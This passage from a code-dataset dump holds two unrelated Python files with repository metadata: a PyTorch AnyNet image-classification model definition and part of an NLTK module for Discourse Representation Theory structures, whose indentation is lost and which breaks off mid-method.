hoya012/bag-of-tricks-for-classification-pytorch
|
d788d7a4e5007da9c410bdd3ef7ce3766d2ba0cd
|
[
"MIT"
] | 15
|
2020-07-09T15:49:33.000Z
|
2021-10-21T11:01:07.000Z
|
#!/usr/bin/env python3
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
"""AnyNet models."""
import torch
import torch.nn as nn
import math
import os
def init_weights(m):
"""Performs ResNet-style weight initialization."""
if isinstance(m, nn.Conv2d):
# Note that there is no bias due to BN
fan_out = m.kernel_size[0] * m.kernel_size[1] * m.out_channels
m.weight.data.normal_(mean=0.0, std=math.sqrt(2.0 / fan_out))
elif isinstance(m, nn.BatchNorm2d):
zero_init_gamma = (
hasattr(m, "final_bn") and m.final_bn and False
)
m.weight.data.fill_(0.0 if zero_init_gamma else 1.0)
m.bias.data.zero_()
elif isinstance(m, nn.Linear):
m.weight.data.normal_(mean=0.0, std=0.01)
m.bias.data.zero_()
def get_stem_fun(stem_type):
"""Retrives the stem function by name."""
stem_funs = {
"res_stem_cifar": ResStemCifar,
"res_stem_in": ResStemIN,
"simple_stem_in": SimpleStemIN,
}
assert stem_type in stem_funs.keys(), "Stem type '{}' not supported".format(
stem_type
)
return stem_funs[stem_type]
def get_block_fun(block_type):
"""Retrieves the block function by name."""
block_funs = {
"vanilla_block": VanillaBlock,
"res_basic_block": ResBasicBlock,
"res_bottleneck_block": ResBottleneckBlock,
}
assert block_type in block_funs.keys(), "Block type '{}' not supported".format(
block_type
)
return block_funs[block_type]
class AnyHead(nn.Module):
"""AnyNet head."""
def __init__(self, w_in, nc):
super(AnyHead, self).__init__()
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(w_in, nc, bias=True)
def forward(self, x):
x = self.avg_pool(x)
x = x.view(x.size(0), -1)
x = self.fc(x)
return x
class VanillaBlock(nn.Module):
"""Vanilla block: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Vanilla block does not support bm, gw, and se_r options"
super(VanillaBlock, self).__init__()
self._construct(w_in, w_out, stride)
def _construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN, ReLU
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.b_relu = nn.ReLU(inplace=True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class BasicTransform(nn.Module):
"""Basic transformation: [3x3 conv, BN, Relu] x2"""
def __init__(self, w_in, w_out, stride):
super(BasicTransform, self).__init__()
self._construct(w_in, w_out, stride)
def _construct(self, w_in, w_out, stride):
# 3x3, BN, ReLU
self.a = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=stride, padding=1, bias=False
)
self.a_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN
self.b = nn.Conv2d(w_out, w_out, kernel_size=3, stride=1, padding=1, bias=False)
self.b_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.b_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBasicBlock(nn.Module):
"""Residual basic block: x + F(x), F = basic transform"""
def __init__(self, w_in, w_out, stride, bm=None, gw=None, se_r=None):
assert (
bm is None and gw is None and se_r is None
), "Basic transform does not support bm, gw, and se_r options"
super(ResBasicBlock, self).__init__()
self._construct(w_in, w_out, stride)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
def _construct(self, w_in, w_out, stride):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BasicTransform(w_in, w_out, stride)
self.relu = nn.ReLU(True)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class SE(nn.Module):
"""Squeeze-and-Excitation (SE) block"""
def __init__(self, w_in, w_se):
super(SE, self).__init__()
self._construct(w_in, w_se)
def _construct(self, w_in, w_se):
# AvgPool
self.avg_pool = nn.AdaptiveAvgPool2d((1, 1))
# FC, Activation, FC, Sigmoid
self.f_ex = nn.Sequential(
nn.Conv2d(w_in, w_se, kernel_size=1, bias=True),
nn.ReLU(inplace=True),
nn.Conv2d(w_se, w_in, kernel_size=1, bias=True),
nn.Sigmoid(),
)
def forward(self, x):
return x * self.f_ex(self.avg_pool(x))
class BottleneckTransform(nn.Module):
"""Bottlenect transformation: 1x1, 3x3, 1x1"""
def __init__(self, w_in, w_out, stride, bm, gw, se_r):
super(BottleneckTransform, self).__init__()
self._construct(w_in, w_out, stride, bm, gw, se_r)
def _construct(self, w_in, w_out, stride, bm, gw, se_r):
# Compute the bottleneck width
w_b = int(round(w_out * bm))
# Compute the number of groups
num_gs = w_b // gw
# 1x1, BN, ReLU
self.a = nn.Conv2d(w_in, w_b, kernel_size=1, stride=1, padding=0, bias=False)
self.a_bn = nn.BatchNorm2d(w_b, eps=1e-5, momentum=0.1)
self.a_relu = nn.ReLU(inplace=True)
# 3x3, BN, ReLU
self.b = nn.Conv2d(
w_b, w_b, kernel_size=3, stride=stride, padding=1, groups=num_gs, bias=False
)
self.b_bn = nn.BatchNorm2d(w_b, eps=1e-5, momentum=0.1)
self.b_relu = nn.ReLU(inplace=True)
# Squeeze-and-Excitation (SE)
if se_r:
w_se = int(round(w_in * se_r))
self.se = SE(w_b, w_se)
# 1x1, BN
self.c = nn.Conv2d(w_b, w_out, kernel_size=1, stride=1, padding=0, bias=False)
self.c_bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.c_bn.final_bn = True
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResBottleneckBlock(nn.Module):
"""Residual bottleneck block: x + F(x), F = bottleneck transform"""
def __init__(self, w_in, w_out, stride, bm=1.0, gw=1, se_r=None):
super(ResBottleneckBlock, self).__init__()
self._construct(w_in, w_out, stride, bm, gw, se_r)
def _add_skip_proj(self, w_in, w_out, stride):
self.proj = nn.Conv2d(
w_in, w_out, kernel_size=1, stride=stride, padding=0, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
def _construct(self, w_in, w_out, stride, bm, gw, se_r):
# Use skip connection with projection if shape changes
self.proj_block = (w_in != w_out) or (stride != 1)
if self.proj_block:
self._add_skip_proj(w_in, w_out, stride)
self.f = BottleneckTransform(w_in, w_out, stride, bm, gw, se_r)
self.relu = nn.ReLU(True)
def forward(self, x):
if self.proj_block:
x = self.bn(self.proj(x)) + self.f(x)
else:
x = x + self.f(x)
x = self.relu(x)
return x
class ResStemCifar(nn.Module):
"""ResNet stem for CIFAR."""
def __init__(self, w_in, w_out):
super(ResStemCifar, self).__init__()
self._construct(w_in, w_out)
def _construct(self, w_in, w_out):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=3, stride=1, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class ResStemIN(nn.Module):
"""ResNet stem for ImageNet."""
def __init__(self, w_in, w_out):
super(ResStemIN, self).__init__()
self._construct(w_in, w_out)
def _construct(self, w_in, w_out):
# 7x7, BN, ReLU, maxpool
self.conv = nn.Conv2d(
w_in, w_out, kernel_size=7, stride=2, padding=3, bias=False
)
self.bn = nn.BatchNorm2d(w_out, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
self.pool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class SimpleStemIN(nn.Module):
"""Simple stem for ImageNet."""
def __init__(self, in_w, out_w):
super(SimpleStemIN, self).__init__()
self._construct(in_w, out_w)
def _construct(self, in_w, out_w):
# 3x3, BN, ReLU
self.conv = nn.Conv2d(
in_w, out_w, kernel_size=3, stride=2, padding=1, bias=False
)
self.bn = nn.BatchNorm2d(out_w, eps=1e-5, momentum=0.1)
self.relu = nn.ReLU(True)
def forward(self, x):
for layer in self.children():
x = layer(x)
return x
class AnyStage(nn.Module):
"""AnyNet stage (sequence of blocks w/ the same output shape)."""
def __init__(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
super(AnyStage, self).__init__()
self._construct(w_in, w_out, stride, d, block_fun, bm, gw, se_r)
def _construct(self, w_in, w_out, stride, d, block_fun, bm, gw, se_r):
# Construct the blocks
for i in range(d):
# Stride and w_in apply to the first block of the stage
b_stride = stride if i == 0 else 1
b_w_in = w_in if i == 0 else w_out
# Construct the block
self.add_module(
"b{}".format(i + 1), block_fun(b_w_in, w_out, b_stride, bm, gw, se_r)
)
def forward(self, x):
for block in self.children():
x = block(x)
return x
class AnyNet(nn.Module):
"""AnyNet model."""
def __init__(self, shape, num_classes=2, checkpoint_dir='checkpoint', checkpoint_name='Network', **kwargs):
super(AnyNet, self).__init__()
self.shape = shape
self.num_classes = num_classes
self.checkpoint_dir = checkpoint_dir
self.checkpoint_name = checkpoint_name
if len(shape) != 3:
raise ValueError('Invalid shape: {}'.format(shape))
self.H, self.W, self.C = shape
if not os.path.exists(checkpoint_dir):
os.makedirs(checkpoint_dir)
self.checkpoint_path = os.path.join(checkpoint_dir, checkpoint_name, 'model.pt')
if kwargs:
self._construct(
stem_type=kwargs["stem_type"],
stem_w=kwargs["stem_w"],
block_type=kwargs["block_type"],
ds=kwargs["ds"],
ws=kwargs["ws"],
ss=kwargs["ss"],
bms=kwargs["bms"],
gws=kwargs["gws"],
se_r=kwargs["se_r"],
nc=self.num_classes #kwargs["nc"],
)
else:
self._construct(
stem_type="plain_block",
stem_w=32,
block_type="plain_block",
ds=[],
ws=[],
ss=[],
bms=[],
gws=[],
se_r=0.25 if True else None,
nc=self.num_classes,
)
self.apply(init_weights)
def _construct(self, stem_type, stem_w, block_type, ds, ws, ss, bms, gws, se_r, nc):
# Generate dummy bot muls and gs for models that do not use them
bms = bms if bms else [1.0 for _d in ds]
gws = gws if gws else [1 for _d in ds]
# Group params by stage
stage_params = list(zip(ds, ws, ss, bms, gws))
# Construct the stem
stem_fun = get_stem_fun(stem_type)
self.stem = stem_fun(3, stem_w)
# Construct the stages
block_fun = get_block_fun(block_type)
prev_w = stem_w
for i, (d, w, s, bm, gw) in enumerate(stage_params):
self.add_module(
"s{}".format(i + 1), AnyStage(prev_w, w, s, d, block_fun, bm, gw, se_r)
)
prev_w = w
# Construct the head
self.prev_w = prev_w
self.head = AnyHead(w_in=prev_w, nc=nc)
def forward(self, x):
for module in self.children():
x = module(x)
return x
def save(self, checkpoint_name=''):
if checkpoint_name == '':
torch.save(self.state_dict(), self.checkpoint_path)
else:
checkpoint_path = os.path.join(self.checkpoint_dir, self.checkpoint_name, checkpoint_name + '.pt')
torch.save(self.state_dict(), checkpoint_path)
def load(self, checkpoint_name=''):
if checkpoint_name == '':
self.load_state_dict(torch.load(self.checkpoint_path))
else:
checkpoint_path = os.path.join(self.checkpoint_dir, self.checkpoint_name, checkpoint_name + '.pt')
self.load_state_dict(torch.load(checkpoint_path))
| 33.434053
| 111
| 0.581982
|
08588e8207155a6821ba8a51db8716daf0e00080
| 58,781
|
py
|
Python
|
taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py
|
hectormartinez/rougexstem
|
32da9eab253cb88fc1882e59026e8b5b40900a25
|
[
"Apache-2.0"
] | null | null | null |
taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py
|
hectormartinez/rougexstem
|
32da9eab253cb88fc1882e59026e8b5b40900a25
|
[
"Apache-2.0"
] | null | null | null |
taln2016/icsisumm-primary-sys34_v1/nltk/nltk-0.9.2/nltk_contrib/drt/DRT.py
|
hectormartinez/rougexstem
|
32da9eab253cb88fc1882e59026e8b5b40900a25
|
[
"Apache-2.0"
] | null | null | null |
from nltk.internals import Counter
from Tkinter import Canvas
from Tkinter import Tk
from tkFont import Font
from nltk.sem import logic
class Error(Exception): pass
def unique_variable(counter=None):
if counter is None: counter = DRS._counter
unique = counter.get()
return VariableExpression(Variable('z'+str(unique)))
class Expression(logic.Expression):
def replace_unique(self, variable, counter=None, replace_bound=False):
"""
Replace a variable v with a new, uniquely-named variable.
"""
return self.replace(variable, unique_variable(counter), replace_bound)
def toFol(self):
return self
def resolve_anaphora(self, trail=[]):
return self
def negate(self):
if isinstance(self, AbstractDRS):
return ApplicationDrs(DrsOperator('not'), self)
else:
return ApplicationExpression(FolOperator('not'), self)
class VariableBinderExpression(Expression, logic.VariableBinderExpression):
"""A variable binding expression: e.g. \\x.M."""
# for generating "unique" variable names during alpha conversion.
_counter = Counter()
def resolve_anaphora(self, trail=[]):
return self.__class__(self.variable, self.term.resolve_anaphora(trail + [self]))
def toFol(self):
return self.__class__(self.variable, self.term.toFol())
class LambdaExpression(VariableBinderExpression, logic.LambdaExpression):
pass
class SomeExpression(VariableBinderExpression, logic.SomeExpression):
pass
class AllExpression(VariableBinderExpression, logic.AllExpression):
pass
class Variable(logic.Variable):
pass
class VariableExpression(Expression, logic.VariableExpression):
pass
class Constant(logic.Constant):
pass
class ConstantExpression(Expression, logic.ConstantExpression):
pass
class IndVariableExpression(VariableExpression, logic.IndVariableExpression):
pass
class FolOperator(ConstantExpression, logic.Operator):
pass
class AbstractDRS(Expression):
"""A Discourse Representation Structure."""
def __init__(self):
Expression.__init__(self)
if self.__class__ is AbstractDRS:
raise NotImplementedError
self._size = None
def __add__(self, other):
raise NotImplementedError
def replace(self, variable, expression, replace_bound=False):
raise NotImplementedError
def free(self):
raise NotImplementedError
def get_refs(self):
return []
def simplify(self):
raise NotImplementedError
def infixify(self):
raise NotImplementedError
def __repr__(self):
raise NotImplementedError
def __str__(self):
raise NotImplementedError
def toFol(self):
raise NotImplementedError
def tp_equals(self, other):
'''
Pass the expression (self <-> other) to the theorem prover.
If the prover says it is valid, then the self and other are equal.
'''
assert isinstance(self, AbstractDRS)
assert isinstance(other, AbstractDRS)
from nltk_contrib.inference import inference
f1 = self.simplify().toFol();
f2 = other.simplify().toFol();
bicond = ApplicationExpression(ApplicationExpression(FolOperator('iff'), f1), f2)
return inference.get_prover(bicond).prove()
def draw(self, x=3, y=3, canvas=None, use_parens=None):
raise NotImplementedError
def get_drawing_size(self, canvas=None, use_parens=None):
raise NotImplementedError
class DRS(AbstractDRS):
# for generating "unique" variable names during alpha conversion.
_counter = Counter()
"""A Discourse Representation Structure."""
def __init__(self, refs, conds):
AbstractDRS.__init__(self)
self.refs = refs # a list of Variables
self.conds = conds # a list of Expressions, DRSs, and DRS_concs
def __add__(self, other):
"""DRS Concatenation"""
assert isinstance(other, DRS)
return ConcatenationDRS(ApplicationDRS(DrsOperator(Tokens.DRS_CONC), self), other)
def replace(self, variable, expression, replace_bound=False):
"""Replace all instances of variable v with expression E in self,
where v is free in self."""
r_refs = [] #the list of refs after replacements
r_conds = [cond for cond in self.conds]
for ref in self.refs:
if ref.variable in expression.free():
v = Variable('z' + str(self._counter.get())) #get a new var name
r_conds = [cond.replace(ref.variable, VariableExpression(v), True) for cond in r_conds] #replace every instance of 'ref' with 'v' in every condition
r_refs.append(VariableExpression(v)) #add the new ref ('v') to the list
else:
r_refs.append(ref) #no replacement needed; add the ref to the list
#===============================================================================
# Alpha convert variables that appear on the left side of an implication. This special processing is
# required because referents on the left side of an implication are accessable to the right
#===============================================================================
for cond in r_conds:
if isinstance(cond, ApplicationDRS) and isinstance(cond.first, ApplicationDRS) and isinstance(cond.first.first, DrsOperator) and cond.first.first.operator == 'implies':
for ref in cond.first.second.get_refs():
if ref.variable in expression.free():
r_conds.remove(cond)
v = Variable('z' + str(self._counter.get())) #get a new var name
r_conds.append(cond.replace(ref.variable, VariableExpression(v), True)) #replace every instance of 'ref' with 'v' in the condition
if replace_bound:
try:
r_refs.remove(IndVariableExpression(variable))
r_refs.append(expression)
except ValueError: pass
r_conds = [cond.replace(variable, expression, replace_bound) for cond in r_conds] #replace 'variable' with 'expression' in each condition
return DRS(r_refs, r_conds)
def free(self):
conds_free = set()
for cond in self.conds:
conds_free = conds_free.union(cond.free())
refs_set = set([ref.variable for ref in self.refs])
return conds_free #.difference(refs_set)
def get_refs(self):
return self.refs
def resolve_anaphora(self, trail=[]):
r_conds = []
for cond in self.conds:
r_cond = cond.resolve_anaphora(trail + [self])
# if the condition is of the form '(x = [])' then do not include it
if not DRS._isNullResolution(r_cond):
r_conds.append(r_cond)
return self.__class__(self.refs, r_conds)
def _isNullResolution(self):
return isinstance(self, ApplicationExpression) and \
isinstance(self.first, ApplicationExpression) and \
isinstance(self.first.first, FolOperator) and \
self.first.first.operator == Tokens.EQ and \
((isinstance(self.second, PossibleAntecedents) and not self.second) or \
(isinstance(self.first.second, PossibleAntecedents) and not self.first.second))
_isNullResolution = staticmethod(_isNullResolution)
def simplify(self):
r_refs = [ref.simplify() for ref in self.refs]
r_conds = [cond.simplify() for cond in self.conds]
return DRS(r_refs, r_conds)
def infixify(self):
r_refs = [ref.infixify() for ref in self.refs]
r_conds = [cond.infixify() for cond in self.conds]
return DRS(r_refs, r_conds)
def toFol(self):
accum = None
for cond in self.conds[::-1]:
if not accum:
accum = cond.toFol()
else:
accum = ApplicationExpression( ApplicationExpression(FolOperator('and'), cond.toFol()), accum)
for ref in self.refs[::-1]:
accum = SomeExpression(ref.variable, accum)
return accum
def __repr__(self):
accum = '%s([' % (Tokens.DRS)
first = True
for ref in self.refs:
if not first:
accum += ','
else:
first = False
accum += ref.__str__()
accum += '],['
first = True
for cond in self.conds:
if not first:
accum += ','
else:
first = False
accum += cond.__str__()
accum += '])'
return accum
def __str__(self):
return self.__repr__()
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
x_current = x+canvas._BUFFER #indent the left side
y_current = y+canvas._BUFFER #indent the top
######################################
# Draw Discourse Referents
######################################
text = ''
first = True
for ref in self.refs:
if not first:
text += ', '
else:
first = False
text += str(ref.variable)
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
max_width = canvas.font.measure(text)
y_current += text_height+canvas._BUFFER
horiz_line_y = y_current
y_current += canvas._BUFFER
######################################
# Draw Conditions
######################################
for cond in self.conds:
if isinstance(cond, AbstractDRS) or isinstance(cond, ApplicationExpression):
bottom_right_corner = cond.draw(x_current, y_current, canvas)
max_width = max(max_width, bottom_right_corner[0]-x_current)
y_current = bottom_right_corner[1]+canvas._BUFFER
else:
text = str(cond)
canvas.create_text(x_current, y_current, anchor='nw', font=canvas.font, text=text)
max_width = max(max_width, canvas.font.measure(text))
y_current += text_height+canvas._BUFFER
######################################
# Draw Box
######################################
x_current = x+max_width+canvas._BUFFER*2
if (y_current - horiz_line_y) < text_height:
y_current += text_height
canvas.create_rectangle(x, y, x_current, y_current)
canvas.create_line(x, horiz_line_y, x_current, horiz_line_y)
return (x_current, y_current)
def get_drawing_size(self, canvas=None, use_parens=None):
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
x_current = canvas._BUFFER #indent the left side
y_current = canvas._BUFFER #indent the top
######################################
# Draw Discourse Referents
######################################
text = ''
first = True
for ref in self.refs:
if not first:
text += ', '
else:
first = False
text += str(ref.variable)
max_width = canvas.font.measure(text)
y_current += text_height+canvas._BUFFER
horiz_line_y = y_current
y_current += canvas._BUFFER
######################################
# Draw Conditions
######################################
for cond in self.conds:
if isinstance(cond, AbstractDRS) or isinstance(cond, ApplicationExpression):
cond_size = cond.get_drawing_size(canvas)
max_width = max(max_width, cond_size[0])
y_current += cond_size[1]+canvas._BUFFER
else:
text = str(cond)
max_width = max(max_width, canvas.font.measure(text))
y_current += text_height+canvas._BUFFER
######################################
# Draw Box
######################################
x_current = max_width+canvas._BUFFER*2
if (y_current - horiz_line_y) < text_height:
y_current += text_height
self._size = (x_current, y_current)
return self._size
class DRSVariable(AbstractDRS):
"""A Variable DRS which consists solely of a variable."""
def __init__(self, variable):
AbstractDRS.__init__(self)
assert isinstance(variable, Variable)
self.variable = variable
def variables(self):
return set([self.variable])
def free(self):
return set([self.variable])
def subterms(self):
return set([self])
def replace(self, variable, expression, replace_bound=False):
if self.variable == variable:
return expression
else:
return self
def simplify(self):
return self
def infixify(self):
return self
def name(self):
return self.__str__()
def _skolemise(self, bound_vars, counter):
return self
def __str__(self): return '%s' % self.variable
def toFol(self):
return VariableExpression(self.variable)
def __repr__(self): return "DRSVariable('%s')" % self.variable
def __hash__(self): return hash(repr(self))
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
canvas.create_text(x, y, anchor='nw', font=canvas.font, text=self.variable)
return (x+canvas.font.measure(self.variable), y+text_height)
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
self._size = (canvas.font.measure(self.variable), text_height)
return self._size
class LambdaDRS(AbstractDRS):
"""A lambda expression: \\x.M."""
PREFIX = '\\'
def __init__(self, variable, term):
AbstractDRS.__init__(self)
assert isinstance(variable, Variable)
assert isinstance(term, AbstractDRS)
self.variable = variable
self.term = term
self.prefix = self.__class__.PREFIX.rstrip()
self.binder = (self.prefix, self.variable.name)
self.body = str(self.term)
def _relabel(self, other):
"""
Relabel C{other}'s bound variables to be the same as C{self}'s
variable.
"""
var = VariableExpression(self.variable)
return other.term.replace(other.variable, var)
def applyto(self, other):
return ApplicationDRS(self, other)
def variables(self):
return set([self.variable]).union(self.term.variables())
def free(self):
return self.term.free().difference(set([self.variable]))
def subterms(self):
return self.term.subterms().union([self])
def replace(self, variable, expression, replace_bound=False):
if self.variable == variable:
return self
if self.variable in expression.free():
v = 'z' + str(DRS._counter.get())
self = self.alpha_convert(Variable(v))
return self.__class__(self.variable, self.term.replace(variable, expression, replace_bound))
def alpha_convert(self, newvar):
"""
Rename all occurrences of the variable introduced by this variable
binder in the expression to @C{newvar}.
"""
term = self.term.replace(self.variable, VariableExpression(newvar))
return self.__class__(newvar, term)
def resolve_anaphora(self, trail=[]):
return self.__class__(self.variable, self.term.resolve_anaphora(trail + [self]))
def simplify(self):
return self.__class__(self.variable, self.term.simplify())
def infixify(self):
return self.__class__(self.variable, self.term.infixify())
def toFol(self):
return LambdaExpression(self.variable, self.term.toFol())
def __str__(self, continuation=0):
# Print \x.\y.M as \x y.M.
if continuation:
prefix = ' '
else:
prefix = self.__class__.PREFIX
if self.term.__class__ == self.__class__:
return '%s%s%s' % (prefix, self.variable, self.term.__str__(1))
else:
return '%s%s.%s' % (prefix, self.variable, self.term)
def __hash__(self):
return hash(repr(self))
def _skolemise(self, bound_vars, counter):
bv = bound_vars.copy()
bv.add(self.variable)
return self.__class__(self.variable, self.term._skolemise(bv, counter))
def __repr__(self):
return "LambdaDRS('%s', '%s')" % (self.variable, self.term)
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
# Get Variable Info
text = '%s%s' % (self.__class__.PREFIX, self.variable)
drs = self.term
while isinstance(drs, LambdaDRS):
text += ' %s' % drs.variable
drs = drs.term
text += Tokens.DOT
variables_width = canvas.font.measure(text)
# Draw Term (first, so that we know where to place the variable)
bottom_right_corner = drs.draw(x+variables_width, y, canvas)
# Draw Variables
canvas.create_text(x, y+(bottom_right_corner[1]-y)/2, anchor='w', font=canvas.font, text=text)
return bottom_right_corner
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
text_height = canvas.font.metrics("linespace")
text = '%s%s' % (self.__class__.PREFIX, self.variable)
drs = self.term
while isinstance(drs, LambdaDRS):
text += ' %s' % self.variable
drs = drs.term
text += Tokens.DOT
variables_width = canvas.font.measure(text)
size = drs.get_drawing_size(canvas)
self._size = (size[0]+variables_width, size[1])
return self._size
class DrsOperator(AbstractDRS):
"""
A boolean operator, such as 'not' or 'and', or the equality
relation ('=').
"""
def __init__(self, operator):
AbstractDRS.__init__(self)
assert operator in Tokens.DRS_OPS
self.constant = operator
self.operator = operator
def replace(self, variable, expression, replace_bound=False):
return self
def free(self):
return set()
def simplify(self):
return self
def infixify(self):
return self
def toFol(self):
return FolOperator(self.operator)
def __str__(self): return '%s' % self.operator
def __repr__(self): return "DrsOperator('%s')" % self.operator
def draw(self, x=3, y=3, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
text_height = canvas.font.metrics("linespace")
canvas.create_text(x, y, anchor='nw', font=canvas.font, text=self.operator)
return (x+canvas.font.measure(self.operator), y+text_height)
def get_drawing_size(self, canvas=None, use_parens=None): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
self._size = (canvas.font.measure(self.operator), canvas.font.metrics("linespace"))
return self._size
class ApplicationDRS(AbstractDRS):
"""An application expression: (M N)."""
def __init__(self, first, second):
AbstractDRS.__init__(self)
first_simp = first.simplify()
assert isinstance(first, AbstractDRS)
if not (isinstance(first_simp, LambdaDRS) or isinstance(first_simp, DRSVariable)) :
assert isinstance(second, AbstractDRS)
self.first = first
self.second = second
def variables(self):
return self.first.variables().union(self.second.variables())
def free(self):
return self.first.free().union(self.second.free())
def _functor(self):
if isinstance(self.first, ApplicationDRS):
return self.first._functor()
else:
return self.first
fun = property(_functor,
doc="Every ApplicationDRS has a functor.")
def _operator(self):
functor = self._functor()
if isinstance(functor, DrsOperator):
return str(functor)
else:
raise AttributeError
op = property(_operator,
doc="Only some ApplicationDRSs have operators." )
def _arglist(self):
"""Uncurry the argument list."""
arglist = [str(self.second)]
if isinstance(self.first, ApplicationDRS):
arglist.extend(self.first._arglist())
return arglist
def _args(self):
arglist = self._arglist()
arglist.reverse()
return arglist
args = property(_args,
doc="Every ApplicationDRS has args.")
def subterms(self):
first = self.first.subterms()
second = self.second.subterms()
return first.union(second).union(set([self]))
def replace(self, variable, expression, replace_bound=False):
return self.__class__(self.first.replace(variable, expression, replace_bound),\
self.second.replace(variable, expression, replace_bound))
def get_refs(self):
first = self.first.simplify()
if isinstance(first, DrsOperator) and first.operator == Tokens.DRS_CONC:
second = self.second.simplify()
refs = second.get_refs()
return refs
else:
return []
def resolve_anaphora(self, trail=[]):
trail_addition = [self]
if isinstance(self.first, ApplicationDRS) \
and isinstance(self.first.first, DrsOperator) \
and self.first.first.operator == 'implies':
trail_addition.append(self.first.second)
r_first = self.first.resolve_anaphora(trail + trail_addition)
r_second = self.second.resolve_anaphora(trail + trail_addition)
return self.__class__(r_first, r_second)
def simplify(self):
first = self.first.simplify()
second = self.second.simplify()
if isinstance(first, LambdaDRS):
variable = first.variable
term = first.term
return term.replace(variable, second).simplify()
else:
return self.__class__(first, second)
def infixify(self):
first = self.first.infixify()
second = self.second.infixify()
if isinstance(first, DrsOperator) and not str(first) == 'not':
return self.__class__(second, first)
else:
return self.__class__(first, second)
def toFol(self):
if isinstance(self.first, ApplicationDRS) \
and isinstance(self.first.first, DrsOperator) \
and self.first.first.operator == 'implies':
first_drs = self.first.second
second_drs = self.second
accum = None
for cond in first_drs.conds[::-1]:
if not accum:
accum = cond.toFol()
else:
accum = ApplicationExpression(ApplicationExpression(FolOperator('and'), cond.toFol()), accum)
accum = ApplicationExpression(ApplicationExpression(FolOperator('implies'), accum ), second_drs.toFol())
for ref in first_drs.refs[::-1]:
accum = AllExpression(ref.variable, accum)
return accum
else:
return ApplicationExpression(self.first.toFol(), self.second.toFol())
def _skolemise(self, bound_vars, counter):
first = self.first._skolemise(bound_vars, counter)
second = self.second._skolemise(bound_vars, counter)
return self.__class__(first, second)
def __str__(self):
# Print ((M N) P) as (M N P).
strFirst = str(self.first)
if isinstance(self.first, ApplicationDRS) and \
not isinstance(self.second, DrsOperator):
strFirst = strFirst[1:-1]
return '(%s %s)' % (strFirst, self.second)
def __repr__(self): return "ApplicationDRS('%s', '%s')" % (self.first, self.second)
def __hash__(self): return hash(repr(self))
def draw(self, x=3, y=3, canvas=None, use_parens=True): #args define the top-left corner of the box
if not canvas:
canvas = init_canvas(self)
if not self._size:
self.get_drawing_size(canvas, use_parens)
######################################
# Get sizes of 'first' and 'second'
######################################
if isinstance(self.first, AbstractDRS):
first_size = self.first._size
else:
first_size = (canvas.font.measure(self.first), canvas.font.metrics("linespace"))
if isinstance(self.second, AbstractDRS):
second_size = self.second._size
else:
second_size = (canvas.font.measure(self.second), canvas.font.metrics("linespace"))
max_height = max(first_size[1], second_size[1])
if (isinstance(self.first, ApplicationDRS) or isinstance(self.first, ApplicationExpression)) and \
not isinstance(self.second, DrsOperator):
first_use_parens = False
else:
first_use_parens = True
x_current = x
if use_parens:
#Draw Open Paren
